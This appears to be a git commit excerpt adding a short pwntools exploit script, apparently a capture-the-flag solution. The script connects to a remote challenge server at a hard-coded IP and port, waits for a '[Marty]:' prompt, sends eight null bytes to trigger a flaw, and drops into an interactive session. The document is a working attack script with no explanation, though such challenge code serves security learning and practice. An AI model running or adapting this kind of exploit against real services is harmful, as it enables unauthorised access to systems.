This commit is contained in:
2023-11-24 17:54:35 +01:00
parent adf3a00bd7
commit eaec057bb1
138 changed files with 6861 additions and 0 deletions

View File

@@ -0,0 +1,9 @@
from pwn import *
# io = process("./formula")
io = remote("94.237.59.206", 35564)
io.recvuntil("[Marty]:")
io.send(b'\x00' *8)
io.interactive()